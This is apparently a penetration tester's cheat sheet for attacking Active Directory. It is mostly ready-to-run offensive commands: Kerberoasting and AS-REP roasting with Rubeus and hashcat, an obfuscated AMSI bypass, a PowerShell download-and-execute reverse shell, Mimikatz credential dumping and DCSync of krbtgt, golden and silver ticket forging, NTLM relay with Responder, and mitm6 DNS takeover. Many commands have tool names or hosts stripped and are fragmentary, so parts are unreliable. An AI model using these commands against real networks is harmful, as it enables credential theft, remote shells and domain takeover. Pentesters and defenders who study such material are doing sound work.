Basic Active Directory terms


Agent represented by a user account.

  • Regular user accounts (used by employees or for specific task as backups)

  • Computer accounts (ends with $). Computers in AD are a users subclass.


  • Identified by SPN which indicates the service name and class, the owner and the host computer.

  • Is executed in a computer (the host of the service) as a process.

  • Services (as any process) are running in the context of a user account, with the privileges and permissions of that user.

  • The SPN’s of the services owned by an user are stored in the attribute ServicePrincipalName of that account.

  • Usually Domain Admin or similar role is required to modify the SPN’s of a user.


# Anonymous Credential LDAP Dumping:
ldapsearch -LLL -x -H ldap:// -b ‘’ -s base (objectclass=*)

# Impacket (Must have valid credentials) -all  -dc-ip 

# Impacket
/usr/share/doc/python3-impacket/examples/ username:password@

# Windapsearch:
python3 -d host.domain -u domain\\ldapbind -p PASSWORD -U
# Go version

cme smb IP -u '' -p '' --users --shares

# BloodHound
Import-Module .\sharphound.ps1
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password
# (no shell needed) remote, ldap auth
bloodhound-python -u <user> -p '<password>' -ns <dc.ip> -d <> -c all

# BloodHound Cheatsheet

# Bloodhound raw queries

# Bloodhound complements

# Get BH data from LDAP

# Rubeus
## ASREProasting:
Rubeus.exe asreproast  /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
## Kerberoasting:
Rubeus.exe kerberoast /outfile:<output_TGSs_file>
Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] 
## Pass the key (PTK):
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
# Using the ticket on a Windows target: 
Rubeus.exe ptt /ticket:<ticket_kirbi_file>

# Password Spraying tool

# Kerberoast

# Powerview

# AD Cheatsheets

#  References:

Common vulns

# Users having rights to add computers to domain
add-computer –domainname org.local -Credential ORG\john -restart –force

# AdminCount attribute set on common users
python -u\john -p pass123 -d ';'
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json
Import-Module ActiveDirectory
Get-AdObject -ldapfilter "(admincount=1)" -properties admincount

# High number of users in privileged groups
net group "Schema Admins" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
runas /netonly /user:<DOMAIN>\<USER> cmd.exe
 - Linux:
net rpc group members 'Schema Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
net rpc group members 'Domain Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
net rpc group members 'Enterprise Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
net rpc group members 'Domain Admins' -I -U "john"%"pass123"

# Service accounts being members of Domain Admins
net group "Schema Admins" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain

# Excessive privileges allowing for shadow Domain Admins

# Service accounts vulnerable to Kerberoasting -request
hashcat -m 13100 -a 0 -O --self-test-disable hashes.txt wordlist.txt

# Users with non-expiring passwords
python -u\john -p pass123 -d ';'
grep DONT_EXPIRE_PASSWD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'
 - PS
Import-Module ActiveDirectory
Get-ADUser -filter * -properties Name, PasswordNeverExpires | where { $_.passwordNeverExpires -eq "true" } | where {$_.enabled -eq "true" }

# Users with password not required
python -u\john -p pass123 -d ';'
grep PASSWD_NOTREQD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'
 - PS
Import-Module ActiveDirectory
Get-ADUser -Filter {UserAccountControl -band 0x0020}

# Storing passwords using reversible encryption
mimikatz # lsadump::dcsync / /user:poorjohn

# Storing passwords using LM hashes
- In NTDS.dit
grep -iv ':aad3b435b51404eeaad3b435b51404ee:' dumped_hashes.txt

# Service accounts vulnerable to AS-REP roasting -usersfile userlist.txt -format hashcat -no-pass -request -format hashcat
hashcat -m 18200 -a 0 -O --self-test-disable hashes.txt wordlist.txt
 - PS
Import-Module ActiveDirectory
Get-ADuser -filter * -properties DoesNotRequirePreAuth | where {$._DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name

# Weak domain password policy
net accounts /domain
polenum --username john --password pass123 --domain
enum4linux -P -u john -p pass123 -w dom.local

# Inactive domain accounts
python -u\john -p pass123 -d ';'
sort -t ';' -k 8 domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3, $8}'

# Privileged users with password reset overdue
python -u\john -p pass123 -d ';'
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json > privileged_users.txt

while read user; do grep ";${user};" domain_users.grep; done < privileged_users.txt | \
  grep -v ACCOUNT_DISABLED | sort -t ';' -k 10 | awk -F ';' '{print $3, $10}'
# Users with a weak password
$a = [adsisearcher]”(&(objectCategory=person)(objectClass=user))
$a.PropertiesToLoad.add(“samaccountname”) | out-null
$a.PageSize = 1
$a.FindAll() | % { echo $ } > users.txt

Import-Module ./adlogin.ps1
adlogin users.txt password123

# Credentials in SYSVOL and Group Policy Preferences (GPP)
findstr /s /n /i /p password \\\sysvol\\*
mount.cifs -o,username=john,password="pass@123" // /mnt
grep -ir 'password' /mnt

Quick tips

# Amsi bypass
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

# Powershell Execution policy Bypass
powershell -ep bypass

# To input the output of the first command into second command use this powershell technique
# %{} is an alias for ForEach-Object{}
# ?{} is an alias for Where-Object{}
# $_ is variable
<First command> | %{<Second command> -<argument> $_}

# To filter out an object type we can use this technique with pipe.
?{$_.<object> -eq '<value>’'}

# Find local admin access

# Get Domain sid
Arguments -Domain “domain name”

# Get DC
Arguments -Domain “domain name”

# Get users in current domain
Arguments -UserName “username”

# Get user properties
Arguments -Properties pwdlastset

# Search for a particular string in a user's attributes
Find-UserField -SearchField Description -SearchTerm ”built”

# Get all computers
Get-NetComputer -FullData
Many arguments -OperatingSystem -Ping -FullData

# Get groups
Arguments -FullData -Domain

# Get members of a particular group
Get-NetGroupMember -GroupName "Domain Admins"

# Group Policies
Get-NetGPO Get-NetGPO -ComputerName Get-NetGPOGroup

# Get users that are part of a Machine's local Admin group
Find-GPOComputerAdmin -ComputerName

# Get OUs
Get-NetOU -FullData Get-NetGPO -GPOname

# Mapping forest
Get-NetForest -Verbose
Get-NetForestDomain -Verbose

# Mapping trust
Arguments -Domain
Get-NetForestDomain -Verbose | Get-NetDomainTrust

# Finding Constrained Delegation
Get-DomainUser -TrustedToAuth (Poweview Dev.)

# Finding UnConstrained Delegation
Get-NetComputer -UnConstrained

# Get ACLs
Get-ObjectAcl -SamAccountName -ResolveGUIDs Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose

# Search for interesting ACEs
Invoke-ACLScanner -ResolveGUIDs

# Reverse Shell
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''));Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.X -Port 443
powershell.exe iex (iwr -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress -Port 443

# Make ntlm ps-session
Invoke-Mimikatz -Command '"sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe"'

# Dump creds
Invoke-Mimikatz -Command ‘“lsadump::lsa /patch”’
Invoke-Mimikatz -Command '"lsadump::dcsync /user:\krbtgt"'
(dcsync requires 3 permission )

# Tickets
Inject ticket:-
Invoke-Mimikatz -Command '"kerberos::ptt <location of .kirbi tkt>"'
Export Tickets:-
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

# Golden tkt
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<DomainName> /sid:<Domain's SID> /krbtgt:<krbtgt hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

# Silver tkt
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DomainName> /sid:<DomainSID> /target:<target> /service:<ServiceType> /rc4:<rc4 NTLM Hash of user> /user:<UserToImpersonate> /ptt"'

# TGT tkt
kekeo.exe tgt::ask /user:<user name> /domain:<domain name> /rc4:<rc4 NTLM Hash of user>

# TGS tkt
tgs::s4u /tgt:tgt_ticket.kirbi /user:<user>@<domain> /service:<service name>/<server name>

Relay attacks flow


# First just listen
sudo responder -I eth0 -A

# Check SMB signing disabled
crackmapexec smb --gen-relay-list smb_sign_disabled.txt

Basic attack A

# Modify responder.cfg to disable HTTP and SMB servers
# Start against smb_sign_disabled.txt hosts list -tf smb_sign_disabled.txt
# Then start responder in attack mode
responder -rdP -I eth0 

# Cracking NTLMv2
hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt --force

Basic attack B (socks proxy)

# Modify responder.cfg to disable HTTP and SMB servers
# Start against smb_sign_disabled.txt hosts list -tf smb_sign_disabled.txt -smb2support -socks
# Edit proxychains4.conf to:
socks4 1080
# Run secretsdump 
proxychains dcname\user:password@10.10.10.X
# Even smbclient
proxychains dcname\user:password@10.10.10.X

LDAP Enum -t ldap:// -smb2support

IPv6 DNS Takeover via Mitm6

git clone 
pip install mitm6 
mitm6 -d
# During before step, in other terminal run -6 -t ldaps:// -wh -l dir

LDAP complete guide

AD Mindmap

DACL mindmap

Last updated